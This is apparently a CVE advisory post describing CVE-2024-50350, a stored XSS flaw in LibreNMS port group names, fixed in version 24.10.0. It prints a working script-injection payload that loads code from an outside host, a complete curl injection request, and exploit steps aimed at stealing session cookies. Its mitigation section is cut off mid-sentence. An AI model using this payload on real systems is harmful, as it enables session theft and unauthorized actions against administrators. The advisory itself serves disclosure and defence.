Listen to this Post
The CVE-2024-50350 vulnerability is a Stored Cross-Site Scripting (XSS) issue found in LibreNMS, an open-source network monitoring system . It resides in the “Port Settings” page, specifically within the `name` parameter when creating a new Port Group . An authenticated user with admin privileges can inject a malicious JavaScript payload, such as <script/src=//15.rs></script>, into this field . This payload is designed to bypass length restrictions by sourcing the script from a remote server . The application fails to properly sanitize this input . The payload is stored on the server and later executed when any user (including other administrators) visits the “Port Settings” page where the affected Port Group is associated with a device . The malicious script executes in the context of the victim’s session, which can lead to the theft of session cookies and unauthorized actions . The vulnerability exists because the output is not encoded when rendering the page, specifically in the `EditPortsController.php` file . The issue is fixed in LibreNMS version 24.10.0 .
DailyCVE Form:
Platform: LibreNMS
Version: <= 24.9.1
Vulnerability: Stored XSS
Severity: High
Date: November 15, 2024
Prediction: Patched (24.10.0)
What Undercode Say:
Analytics:
The vulnerability can be triggered with a simple HTTP POST request. An attacker would use the following `curl` command to inject the payload:
curl -X POST http://<your_librenms_host>/port-groups \ -H "Content-Type: application/x-www-form-urlencoded" \ -H "Cookie: <your_session_cookie>" \ -d "_token=<valid_csrf_token>&name=%3Cscript%20src%3D%22%2F%2F15.rs%22%3E%3C%2Fscript%3E&desc=descr"
The vulnerable code path is located in `app/Http/Controllers/Table/EditPortsController.php` at line 69 .
How Exploit:
- Authenticate: Log in to LibreNMS with an account that has admin privileges.
- Navigate: Go to `Ports` > `Manage Port Groups` and click “New Port Group”.
- Inject: In the “Name” field, enter the XSS payload: `name` .
- Save: Click “Save” to store the malicious Port Group.
- Trigger: An administrator adds this malicious Port Group to a device’s port settings. The next time any user loads the “Port Settings” page for that device, the script executes, sending session cookies or performing other actions on behalf of the user .
Protection from this CVE:
- Update: Immediately upgrade LibreNMS to version 24.10.0 or later, which contains the official patch .
- Virtual Patching: If immediate updating is not possible, implement a Web Application Firewall (WAF) rule to block requests to `/port-groups` containing suspicious patterns like `
